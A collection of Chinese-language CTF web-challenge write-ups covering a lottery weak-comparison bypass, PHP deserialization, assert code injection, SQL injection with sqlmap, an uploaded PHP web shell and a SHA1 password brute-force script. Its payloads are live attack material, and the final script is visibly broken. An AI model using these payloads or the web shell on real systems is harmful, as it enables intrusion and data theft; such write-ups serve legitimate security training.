XCTF 4th-QCTF-2018
扫描:http://111.198.29.45:31877/.git/
获得源码 GitHack
然后代码审计:
问题出现在这里:
function buy($req){
require_registered();
require_min_money(2);
$money = $_SESSION['money'];
$numbers = $req['numbers'];
$win_numbers = random_win_nums();
$same_count = 0;
for($i=0; $i<7; $i++){
if($numbers[$i] == $win_numbers[$i]){
$same_count++;
}
}
switch ($same_count) {
case 2:
$prize = 5;
break;
case 3:
$prize = 20;
break;
case 4:
$prize = 300;
break;
case 5:
$prize = 1800;
break;
case 6:
$prize = 200000;
break;
case 7:
$prize = 5000000;
break;
default:
$prize = 0;
break;
}
$money += $prize - 2;
$_SESSION['money'] = $money;
response(['status'=>'ok','numbers'=>$numbers, 'win_numbers'=>$win_numbers, 'money'=>$money, 'prize'=>$prize]);
}
直接改成json格式 弱类型比较
{"action":"buy","numbers":[true,true,true,true,true,true,true]}
XCTF 4th-CyberEarth
题目脑洞:直接爆破id index.php?id=2333
tinyctf-2014
下载附件,将附件更改为html文件
运行是一段js
将eval 改为alert
<script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit\'_ns=[t,n,r,i];for(o=0;o<13;++o){ [0]);.splice(0,1)}}} \'<input id="c">< onclick=$()>Ok</>\');delete _var ","docu.)match(/"];/)!=null=[" write(s[o%4]buttonif(e.ment';for(Y in $=' ')with(_.split($[Y]))_=join(pop());eval(_)</script>
得到一个函数
function $() {
var e = document.getElementById("c").value;
if (e.length == 16) if (e.match(/^be0f23/) != null) if (e.match(/233ac/) != null) if (e.match(/e98aa$/) != null) if (e.match(/c7be9/) != null) {
var t = ["fl", "s_a", "i", "e}"];
var n = ["a", "_h0l", "n"];
var r = ["g{", "e", "_0"];
var i = ["it'", "_", "n"];
var s = [t, n, r, i];
for (var o = 0; o < 13; ++o) {
document.write(s[o % 4][0]);
s[o % 4].splice(0, 1)
}
}
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _
be0f233acc7be98aa 匹配正则 构造字符串 得到flag
XCTF 4th-QCTF-2018
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
print "fangzhang";
}
}
$a = new xctf();
$a->flag = '111';
print serialize($a);
?>
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
wakeup()函数漏洞就是与对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数,如果该数字大于真实属性个数,就会绕过__wakeup()函数
csaw-ctf-2016-quals
git泄漏,得到如下源码
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
代码注入,通过如下payload进行注入:
' and die(show_source('templates/flag.php')) or '
其他paylaod:
'.system("cd ../../../; ls -lA;").'about
'.system("cd /var/www/html/;git diff;").'about
'.system('ls -al;').'aaa
about.php', 'bogus') === false and system('cat templates/flag.php') and strpos('templates/flag
XCTF 4th-QCTF-2018
直接sqlmap可以跑出结果
傻瓜sql注入题目
sqlmap -r 1.txt --dbs
sqlmap -r 1.txt -D news --tables
sqlmap -r 1.txt -D news -T secret_table --dump
<?php
if("admin"===$_GET[id]) {
echo("<p>not allowed!</p>");
exit();
}
$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
echo "<p>Access granted!</p>";
echo "<p>Key: xxxxxxx </p>";
}
?>
Can you anthenticate to this website?
url解码
http://111.198.29.45:40699/?id=%2561dmin
查看元素
更改按键的属性
然后更改文件后缀
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
<?php @eval($_POST['cmd'])?>
然后菜刀
Hack.lu-2017
扫描:
[16:17:28] 200 - 757B - /admin.php
[16:17:28] 200 - 757B - /admin.php
[16:17:53] 200 - 1023B - /index.html
[16:17:56] 200 - 833B - /login.php
[16:17:56] 200 - 833B - /login.php
[16:18:06] 200 - 61B - /robots.txt
http://111.198.29.45:37868//login.php?debug
得到源码
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
$user = $_POST['usr'];
$pass = $_POST['pw'];
$db = new SQLite3('../fancy.db');
$res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
if($res){
$row = $res->fetchArray();
}
else{
echo "<br>Some Error occourred!";
}
if(isset($row['id'])){
setcookie('name',' '.$row['name'], time() + 60, '/');
header("Location: /");
die();
}
}
if(isset($_GET['debug']))
highlight_file('login.php');
?>
没有任何过滤 可以直接扔到sqlmap
得到如下的数据:
+----+-------------------------------+--------+------------------------------------------+
| id | hint | name | password |
+----+-------------------------------+--------+------------------------------------------+
| 1 | my fav word in my fav paper?! | admin | 3fab54a50e770d830c0416df817567662a9dc85c |
| 2 | my love is'? | fritze | 54eae8935c90f467427f05e4ece82cf569f89507 |
| 3 | the password is password | hansi | 34b0bb7c304949f9ff2fc101eef0f048be10d3bd |
+----+-------------------------------+--------+------------------------------------------+
由代码可知,密码是由如下方式得到的:
sha1($pass."Salz!")
admin 的hint 是fav word in fav paper
现在的思路是先爬虫所有的pdf
然后利用pdf的词汇进行爆破,
抓取pdf:写如下脚本:
import requests
import re
import os
import sys
re1 = '[a-fA-F0-9]{32,32}.pdf'
re2 = '[0-9\/]{2,2}index.html'
pdf_list = []
def get_pdf(url):
global pdf_list
print url
req = requests.get(url).text
re_1 = re.findall(re1,req)
for i in re_1:
pdf_url = url+i
pdf_list.append(pdf_url)
re_2 = re.findall(re2,req)
for j in re_2:
new_url = url+j[0:2]
get_pdf(new_url)
return pdf_list
# return re_2
pdf_list = get_pdf('http://111.198.29.45:37868/')
print pdf_list
# for i in pdf_list:
# os.system('wget '+i)
开始爆破
import os
import re
import sys
def get_pdf(dir):
dir_list = os.listdir(dir)
for i in dir_list:
print i[-4:]
if i[-4:]!='.pdf':
dir_list.remove(i)
return dir_list
def get_word_list(path):
rsrcmgr = PDFResourceManager()
retstr = StringIO()
device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
interpreter = PDFPageInterpreter(rsrcmgr, device)
with open(path, 'rb') as fp:
for page in PDFPage.get_pages(fp, set()):
interpreter.process_page(page)
text = retstr.getvalue()
device.close()
retstr.close()
return text
def jiami(j):
import hashlib
sha = hashlib.sha1(j)
encrypts = sha.hexdigest()
return encrypts
pdf_list = get_pdf('./')
for i in paf_list:
word_list = get_word_list(i)
for j in word_list:
sha1 = jiami(j)
if sha1 == '3fab54a50e770d830c0416df817567662a9dc85c':
return j